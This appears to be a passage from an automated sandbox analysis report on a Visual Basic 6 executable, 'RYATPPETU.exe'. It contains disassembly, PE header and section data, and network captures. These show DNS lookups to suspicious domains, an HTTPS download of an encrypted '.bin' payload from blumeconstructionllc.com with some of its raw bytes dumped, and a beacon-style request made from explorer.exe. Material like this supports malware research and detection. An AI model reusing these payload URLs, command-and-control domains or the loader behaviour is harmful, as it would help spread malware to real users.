add byte ptr [ebx+02h], bh
cmp byte ptr [eax], cl
inc ecx
add byte ptr [eax], al
add byte ptr [eax], al
add bh, bh
int3
xor dword ptr [eax], eax
pop es
movsb
idiv dword ptr [ecx+esi*8+6Ch]
pop ds
dec ebx
cmpsb
leave
fistp word ptr [ecx]
test eax, C4F590FCh
inc esp
pop ebx
add al, 47h
fld tbyte ptr [edi+41h]
call far 255Ch : 2942040Ah
fdivr qword ptr [edx]
dec edi
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push cs
add byte ptr [eax], al
add ecx, dword ptr [04000000h]
add byte ptr [eax+72h], dl
outsd
bound eax, dword ptr [eax]
or eax, 42000401h
popad
je 00007F3B7CA3DEE2h
sbb dword ptr [ecx], eax
add byte ptr [edx+00h], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1cf84	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x20000	0x111e	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x220	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x78	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1c0b4	0x1d000	False	0.474592537716	data	6.32641082973	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x1e000	0x1e84	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x20000	0x111e	0x2000	False	0.182983398438	data	2.46625216592	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
ERROR	0x20fe0	0x13e	MS Windows icon resource - 1 icon, 16x16, 16 colors	English	United States
RT_ICON	0x20338	0xca8	data
RT_GROUP_ICON	0x20324	0x14	data
RT_VERSION	0x20140	0x1e4	data	English	United States

Imports

DLL	Import
MSVBVM60.DLL	MethCallEngine, EVENT_SINK_AddRef, DllFunctionCall, EVENT_SINK_Release, EVENT_SINK_QueryInterface, __vbaExceptHandler

Version Infos

Description	Data
Translation	0x0409 0x04b0
ProductVersion	1.00
InternalName	RYATPPETU
FileVersion	1.00
OriginalFilename	RYATPPETU.exe
ProductName	Commodore

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 27, 2021 20:17:09.584096909 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:09.584145069 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:09.584297895 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:09.602543116 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:09.602571964 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:09.673856020 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:09.674012899 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.018652916 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.018697023 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.019912958 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.020032883 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.031068087 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.059653044 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.059716940 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.059952974 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.059982061 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.060067892 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.085839033 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.085994959 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.086015940 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.086045027 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.086106062 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.086114883 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.086144924 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.086169958 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.086179018 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.086219072 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.086251974 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.113292933 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.113467932 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.113610983 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.113687992 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.113713026 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.113729954 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.113827944 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.113878012 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.113893986 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.113924980 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.114020109 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.114039898 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.114069939 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.114115000 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.114152908 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.114166975 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.114761114 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.140347004 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.140520096 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.140619993 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.140675068 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.140700102 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.140754938 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.140805006 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.140821934 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.140913963 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.140914917 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.140943050 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.141031027 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.141064882 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.141168118 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.141206980 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.141331911 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.141334057 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.141354084 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.141458988 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.141479969 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.141583920 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.141606092 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.141717911 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.141720057 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.141740084 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.141859055 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.169152021 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.169291973 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.169401884 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.169403076 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.169446945 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.169548035 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:17:10.169588089 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.169676065 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.170008898 CEST	49697	443	192.168.2.5	45.82.177.176
Oct 27, 2021 20:17:10.170033932 CEST	443	49697	45.82.177.176	192.168.2.5
Oct 27, 2021 20:18:51.265953064 CEST	49698	80	192.168.2.5	172.67.161.80
Oct 27, 2021 20:18:51.282932997 CEST	80	49698	172.67.161.80	192.168.2.5
Oct 27, 2021 20:18:51.283031940 CEST	49698	80	192.168.2.5	172.67.161.80
Oct 27, 2021 20:18:51.283169985 CEST	49698	80	192.168.2.5	172.67.161.80
Oct 27, 2021 20:18:51.300039053 CEST	80	49698	172.67.161.80	192.168.2.5
Oct 27, 2021 20:18:51.616200924 CEST	80	49698	172.67.161.80	192.168.2.5
Oct 27, 2021 20:18:51.616235971 CEST	80	49698	172.67.161.80	192.168.2.5
Oct 27, 2021 20:18:51.616251945 CEST	80	49698	172.67.161.80	192.168.2.5
Oct 27, 2021 20:18:51.616568089 CEST	49698	80	192.168.2.5	172.67.161.80
Oct 27, 2021 20:18:51.616662979 CEST	49698	80	192.168.2.5	172.67.161.80

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 27, 2021 20:17:09.543685913 CEST	54795	53	192.168.2.5	8.8.8.8
Oct 27, 2021 20:17:09.564801931 CEST	53	54795	8.8.8.8	192.168.2.5
Oct 27, 2021 20:18:28.939344883 CEST	49557	53	192.168.2.5	8.8.8.8
Oct 27, 2021 20:18:28.969048023 CEST	53	49557	8.8.8.8	192.168.2.5
Oct 27, 2021 20:18:51.221848965 CEST	61733	53	192.168.2.5	8.8.8.8
Oct 27, 2021 20:18:51.257683992 CEST	53	61733	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 27, 2021 20:17:09.543685913 CEST	192.168.2.5	8.8.8.8	0xb278	Standard query (0)	blumeconstructionllc.com	A (IP address)	IN (0x0001)
Oct 27, 2021 20:18:28.939344883 CEST	192.168.2.5	8.8.8.8	0x1a02	Standard query (0)	www.etr6safvu8.com	A (IP address)	IN (0x0001)
Oct 27, 2021 20:18:51.221848965 CEST	192.168.2.5	8.8.8.8	0x4aa6	Standard query (0)	www.lrbounee.xyz	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 27, 2021 20:17:09.564801931 CEST	8.8.8.8	192.168.2.5	0xb278	No error (0)	blumeconstructionllc.com		45.82.177.176	A (IP address)	IN (0x0001)
Oct 27, 2021 20:18:28.969048023 CEST	8.8.8.8	192.168.2.5	0x1a02	Name error (3)	www.etr6safvu8.com	none	none	A (IP address)	IN (0x0001)
Oct 27, 2021 20:18:51.257683992 CEST	8.8.8.8	192.168.2.5	0x4aa6	No error (0)	www.lrbounee.xyz		172.67.161.80	A (IP address)	IN (0x0001)
Oct 27, 2021 20:18:51.257683992 CEST	8.8.8.8	192.168.2.5	0x4aa6	No error (0)	www.lrbounee.xyz		104.21.9.197	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

blumeconstructionllc.com

www.lrbounee.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49697	45.82.177.176	443	C:\Users\user\Desktop\RYATPPETU.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49698	172.67.161.80	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 27, 2021 20:18:51.283169985 CEST	324	OUT	GET /kb8y/?UL30vp=VG0y4HVkQ1AGt1voBcUsNCEJrT9SlfHUi22gJvk+aIOz4uPxc1TzHkPIPjpZ8++2gXXO&4hP=NPuDZXp0DVz HTTP/1.1 Host: www.lrbounee.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 27, 2021 20:18:51.616200924 CEST	325	IN	HTTP/1.1 404 Not Found Date: Wed, 27 Oct 2021 18:18:51 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qqJ2Q9iCH1RRBQKJHt7%2Bpll1gj8DBHVrUY1%2ByxZfQWtFIoZbTjROcASUpSCa3xt1a89lPkmS%2FOwrIt5r%2Btdm6auT0AZrk%2Fg7h%2BdIwpX%2BPk3RXDFVKvodDvIcTZiBaHT4Vg1K"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6a4dede68e4e4ee6-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 39 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 9f<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.15.8.3</center></body></html>
Oct 27, 2021 20:18:51.616235971 CEST	325	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49697	45.82.177.176	443	C:\Users\user\Desktop\RYATPPETU.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-27 18:17:10 UTC	0	OUT	GET /bin_NXOEaeagUq10.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: blumeconstructionllc.com Cache-Control: no-cache
2021-10-27 18:17:10 UTC	0	IN	HTTP/1.1 200 OK Date: Wed, 27 Oct 2021 18:17:10 GMT Server: Apache Last-Modified: Wed, 27 Oct 2021 13:12:19 GMT Accept-Ranges: bytes Content-Length: 189504 Connection: close Content-Type: application/octet-stream
2021-10-27 18:17:10 UTC	0	IN	Data Raw: 98 c5 fe 81 1d 0e 9b bf b8 3f 56 11 88 03 f6 a9 8e 63 9c bd 9d 00 68 f2 3b 50 5f 32 bf 2b 58 03 76 d7 fd 61 4c 08 75 79 20 83 05 b3 4c 30 da 22 28 66 be 26 5e 7c 5e 92 5d fa 6b b9 65 fd bc bd 20 d1 08 c3 c9 13 30 f2 3b f6 69 06 19 71 17 cb 0f 58 ea f5 48 90 54 be 6f 87 a9 af 44 cf b8 6b eb a2 dd e8 55 ec 32 76 53 02 1b 3e 44 6f 21 95 04 4a 69 98 ee 15 06 d3 eb d6 09 d6 a8 38 b1 61 40 1a a2 25 cd 61 cc 21 ed af b9 9b e8 7c c3 c4 fa 52 a5 dd 86 50 e5 7b 21 21 70 0c 42 c4 6e b6 84 67 93 e7 c1 ed 6f 68 a6 8a 5f 49 d7 64 17 3c 37 30 ce 98 42 13 1f 9d c5 4d 91 11 d1 a9 58 f0 1f 42 87 f1 73 f7 54 c1 f3 5e f7 9a 0d 4d 9a d6 83 bb 38 fc f1 eb b1 95 37 6a c2 c2 d9 08 0b fc 8e 44 b2 61 c8 9b 8b ca 56 6f 53 11 b3 f4 5c 32 79 bc d8 3e e1 1f 0d 22 04 6b 0a 8b 3d f4 28 Data Ascii: ?Vch;P_2+XvaLuy L0"(f&^\|^]ke 0;iqXHToDkU2vS>Do!Ji8a@%a!\|RP{!!pBngoh_Id<70BMXBsT^M87jDaVoS\2y>"k=(
2021-10-27 18:17:10 UTC	8	IN	Data Raw: 96 89 b3 30 5a a9 13 83 4c fb e5 2a 9b 02 b1 7a a8 ab fa 3b 69 7b b9 b8 f3 3b 1b 26 89 78 88 e7 31 ff b9 f5 38 93 8d 45 9a af 0f ff 55 b5 31 07 32 41 32 43 4b 6d 9c 89 a4 95 df 0f 06 d5 13 8a f8 78 d0 88 1f 83 b4 26 2c b9 e3 ca d3 77 b4 26 f2 28 21 ac f3 fd 8f 7d be cc b8 61 b5 68 14 94 60 3c 91 f0 20 59 7e c5 19 cd b9 1f b0 91 91 17 02 64 0c 05 e2 15 c4 07 89 09 cd 85 7f 8b d8 96 26 3d 04 78 0c a6 a7 09 4f 79 d3 bc 3a 9b a7 af 2c b5 b2 4c 8e b9 5e 77 40 93 fc 6f ec ad 0c e5 85 97 12 30 bd 90 6b 0f a0 24 7b fa ab 60 d5 6d 97 54 c7 f2 de 2b 08 a4 aa 06 28 2e 66 10 4b 24 94 1c 3a b3 4e 85 02 f2 45 71 b6 38 97 be 24 37 2b 01 65 1a 27 48 9d 52 3b f8 1c 6a c5 30 23 eb ae 0c 85 39 40 d3 0e a7 c7 56 30 21 0a b8 be 44 59 9f 75 3a 29 e0 5e 26 ef 20 92 eb f9 46 c1 Data Ascii: 0ZL*z;i{;&x18EU12A2CKmx&,w&(!}ah`< Y~d&=xOy:,L^w@o0k${`mT+(.fK$:NEq8$7+e'HR;j0#9@V0!DYu:)^& F
2021-10-27 18:17:10 UTC	15	IN	Data Raw: db 48 5a b9 ca a4 9b c8 b8 55 5a f5 43 56 9e d9 5f bb 50 6d c6 3c c9 52 66 bf 32 82 03 94 1d 3d 0f f7 60 48 a6 e9 c5 69 2a 93 e6 9a 2b 87 93 05 b7 05 54 35 81 cf 53 68 2c 37 6e f3 54 c3 3c 4a b4 ce 87 39 d2 78 28 47 90 cb 70 82 b0 fe 7a 16 1b c6 bf fc 63 f9 42 64 46 97 b9 b0 b6 54 7b 36 3a 7d 5e a9 02 be 6a bd 3a 42 fc 72 f6 67 f0 d1 b5 59 02 07 7e d5 a6 b6 30 d1 c6 3b 42 8a c7 3d 66 61 1d cf dc ac 1e 48 b8 5f bd 98 6c 05 1c b5 72 89 ed 9f e6 bb 7a fa 4b 80 68 07 0c e0 d8 93 66 e4 49 56 4a 25 60 d9 c2 4e c3 41 4a 6a 64 fc fc c2 23 74 11 d8 aa 25 29 51 5f 22 3b 63 60 f3 20 13 b3 36 27 2b 2a 9b 51 71 5a 30 34 9b 9e 78 c7 54 a7 85 b8 7b f0 03 4d fd 39 6a eb 2f 49 d0 cd a8 32 76 d0 c6 1f 6c ac 0d a4 94 04 c1 ec e0 15 ea f9 5e 67 d3 79 2d 97 c7 e0 ec db 7d e5 Data Ascii: HZUZCV_Pm<Rf2=`Hi+T5Sh,7nT<J9x(GpzcBdFT{6:}^j:BrgY~0;B=faH_lrzKhfIVJ%`NAJjd#t%)Q_";c` 6'+QqZ04xT{M9j/I2vl^gy-}
2021-10-27 18:17:10 UTC	23	IN	Data Raw: 0b fa e8 e2 16 2d 01 25 41 d0 06 8f ba 47 9e d0 d6 d7 a6 e0 19 69 28 f2 04 0f 6e ac 4a 39 43 11 c4 75 a9 31 3e 84 2b dc 85 85 42 b0 2e 5b 8b ca 78 ab bf 7b 4f fc 28 f5 fb 6f ed 06 65 1c aa 60 e2 4a 7d 5a 0a 38 c0 9d 61 7c 16 d0 32 0f 94 3b 63 25 c8 e7 62 ce 10 8b 32 25 1f bf 06 bd fa c1 23 63 e3 59 a3 dd 96 ad 38 64 fd 71 1c a4 72 bc 79 c9 cc 46 47 7c 25 bb d5 a2 fd cc 9a 0a 2c 39 36 4f 99 11 9f 6a 50 f0 00 54 1d 4c 15 a8 07 25 e2 87 52 d0 0c 4f d4 db d5 65 eb b2 fe be 44 72 22 02 f9 ae 4d 04 f9 90 14 a9 2c fd 78 d0 21 8b d8 e6 29 34 87 2e c2 99 93 ca 28 84 f5 c6 55 1b 7a c5 49 81 3a 88 cb 80 e8 3e 14 f5 e9 ae 16 cb 24 6a 8c 03 8d 65 2e 32 7a 58 15 ba 84 e1 b7 ec 49 f3 59 1e 14 ae 0e 14 36 ce a0 58 50 14 02 d8 e0 41 56 2a e3 aa 3f b9 7f f6 ad cb 60 7e ad Data Ascii: -%AGi(nJ9Cu1>+B.[x{O(oe`J}Z8a\|2;c%b2%#cY8dqryFG\|%,96OjPTL%ROeDr"M,x!)4.(UzI:>$je.2zXIY6XPAV*?`~
2021-10-27 18:17:10 UTC	31	IN	Data Raw: a2 d7 12 5b 2d 29 5a 30 2c 95 41 9e 1b 13 11 31 13 0a 68 ea 7c f7 b0 af 87 6e c3 46 14 8d 4c b0 34 02 2d d5 38 7f aa 43 3e 58 a6 42 72 2f d3 95 7e c0 2d 1c a2 e6 1b b7 64 ff 6b 29 cf 17 ac ad 8c 0f 40 b1 1c 0c 11 a5 c9 4f a9 be 16 3a f4 73 8a 9d 13 bf 84 46 ac 0f 91 e0 5c 2b c7 b2 48 9d 88 41 48 25 ba b5 33 d3 b8 ef e8 e0 16 7f b6 d3 a9 ee 22 85 5c 5d eb ca 7d fc fe 66 29 8d 8d 1d 99 23 aa 75 51 2c 99 bb e7 de 78 3b 3e ec 12 5d cf 79 4a 21 49 b8 ee 08 8f db c2 3c 9e 8f 0b 01 39 f6 e6 3d a5 28 43 03 0d ba 8a 13 67 fe 8c 3d 7e a7 7c 81 de c6 e9 c0 6b 38 90 7f 3b 8c 6a de 48 5c 6e 24 fa 9d 3b fe 29 06 5f ed da 17 fb 05 ea 1b 1b 7d 37 fd 09 07 1b b5 c8 47 46 8c 07 e0 b7 c0 bc 2c 4a ce 68 b0 65 30 f0 96 7b a2 7c 8d 07 c2 c6 12 96 f4 80 1c a1 48 b8 72 53 67 93 Data Ascii: [-)Z0,A1h\|nFL4-8C>XBr/~-dk)@O:sF\+HAH%3"\]}f)#uQ,x;>]yJ!I<9=(Cg=~\|k8;jH\n$;)_}7GF,Jhe0{\|HrSg
2021-10-27 18:17:10 UTC	39	IN	Data Raw: bc 45 b5 d3 62 5f 06 56 6e 41 28 68 93 a8 80 10 07 9c 8f b7 a3 4c d5 77 39 5b 8c 22 f1 17 be a5 3f 52 04 5e 90 e1 7f 70 4c 92 79 53 53 d0 fc 3f 9f f1 ef 44 58 f5 13 20 9e a9 ec 00 29 2c b8 10 f1 a8 1a 8e ad 73 e5 24 89 78 18 f4 1a 2d 6d db f4 e2 c4 6d 09 49 14 23 04 e2 8c 2b 36 f4 28 32 ea bc 94 ae 89 f9 7d 4e ed bb cc 5d 41 6d a7 0f 4e 78 93 b2 c7 04 0d 3f 48 b7 c6 54 d6 e6 17 a8 ba c9 dc a8 18 a1 e5 ec 66 2b 90 7f 3d 87 54 09 08 71 3e 71 43 a6 95 18 64 fc af ef ba fe 02 d7 82 b4 86 5e 8b 68 2a 5c 52 88 1c 96 3b 74 bb e3 e3 32 70 8c ad 23 cd b1 52 6c ae f4 88 c7 17 5a ae 77 4b 0b dc e6 a4 a3 46 df 26 37 c1 41 d6 b8 46 44 2b 73 5c 29 8e 97 bf 4f 46 46 88 1e 86 25 4a c0 82 b9 67 19 55 43 44 34 f9 41 be c9 b9 19 c0 83 9b 07 b4 8e 56 2b 2a 33 68 18 e7 a2 65 Data Ascii: Eb_VnA(hLw9["?R^pLySS?DX ),s$x-mmI#+6(2}N]AmNx?HTf+=Tq>qCd^h\R;t2p#RlZwKF&7AFD+s\)OFF%JgUCD4AV+3he
2021-10-27 18:17:10 UTC	47	IN	Data Raw: 5f ab ec ce cd 97 2c c5 9f af b9 48 c7 97 40 a9 d8 80 b2 e8 e4 51 c7 39 2e d9 fd da ef 3f cf b6 14 91 e7 1d fc c1 60 9b 59 bb 69 10 6f 99 12 4d d7 c1 61 d8 92 ed 8f 9d a9 d7 5a 8d d1 1e d3 e0 1a a7 69 41 00 0b a4 b7 d9 1f c4 03 b0 b3 3b a3 c3 a2 66 70 9c 0b 5f 9a b4 b2 f1 07 be 30 46 10 28 79 37 30 d8 55 d1 a8 8b 2e d2 41 3f 44 9c 18 67 f2 95 f5 47 94 7e 95 10 7f 48 c6 88 4c 11 c9 cd b3 03 5a c6 c1 73 e6 73 f9 a0 8e be 88 72 b6 29 1f 64 d0 4a ec c9 04 05 9a 10 21 af 51 0b ca a3 96 ff 19 e7 c5 14 41 bd 29 fa 80 81 cd 27 54 ec df cd 49 26 3a 25 e2 c4 cd e4 93 7d b8 2d 9e 10 4a 39 df df b9 9b be 30 fe 6c 7b 84 c3 d1 06 41 9a 1f 46 82 89 75 bb ea e5 a2 39 6f 0c 13 3a e9 27 a5 1e a3 67 93 cc 06 50 b0 05 52 49 80 cf 55 48 90 0f f3 c5 3e 26 e3 36 8f 51 5c 93 f6 Data Ascii: _,H@Q9.?`YioMaZiA;fp_0F(y70U.A?DgG~HLZssr)dJ!QA)'TI&:%}-J90l{AFu9o:'gPRIUH>&6Q\
2021-10-27 18:17:10 UTC	55	IN	Data Raw: b1 21 13 66 1a 6d 4b ea ee 93 3e d7 7b 06 e1 a1 fa de 90 5e f8 af 83 a1 50 fa 01 33 aa 60 47 80 2b 6b e2 e4 b7 35 b5 ae e4 7a 65 4b 65 9e 10 3c 13 02 94 ea 8f e9 d6 09 80 5b f8 d9 67 4c 05 18 7b 40 58 63 11 33 e8 e9 b1 ac d8 33 51 6c de 6d 36 17 3f 82 e1 f5 5a 51 6f 73 42 20 30 f0 47 7a f7 e9 1c de 16 0f 65 e5 7b 92 2b ac b6 a0 5f aa 76 2c 1d 97 57 ee c9 ee 12 d1 a9 65 78 3c 36 07 14 18 1e 31 78 1c 94 fb 1c b4 59 7a b7 70 bb f5 c8 e6 e2 db 2c c3 82 be 09 35 95 e6 d3 de 48 49 d8 76 6c ed 19 04 54 67 91 6e 1a 3a 8b 13 fc 8e b7 67 af 01 22 04 83 6e f9 3d f4 78 ee e1 5e dc fe da 7b 38 3d ec eb 10 fb 57 49 2a 59 75 6e f6 f3 12 39 8f 2b 42 5f 82 ce f9 ff 9d 26 95 8b d8 2b 5f 41 96 74 53 a2 74 67 66 d0 bc b8 21 2c fd ab b2 2b e0 50 76 39 91 3f 8c 96 33 3e 05 58 Data Ascii: !fmK>{^P3`G+k5zeKe<[gL{@Xc33Qlm6?ZQosB 0Gze{+_v,Wex<61xYzp,5HIvlTgn:g"n=x^{8=WI*Yun9+B_&+_AtStgf!,+Pv9?3>X
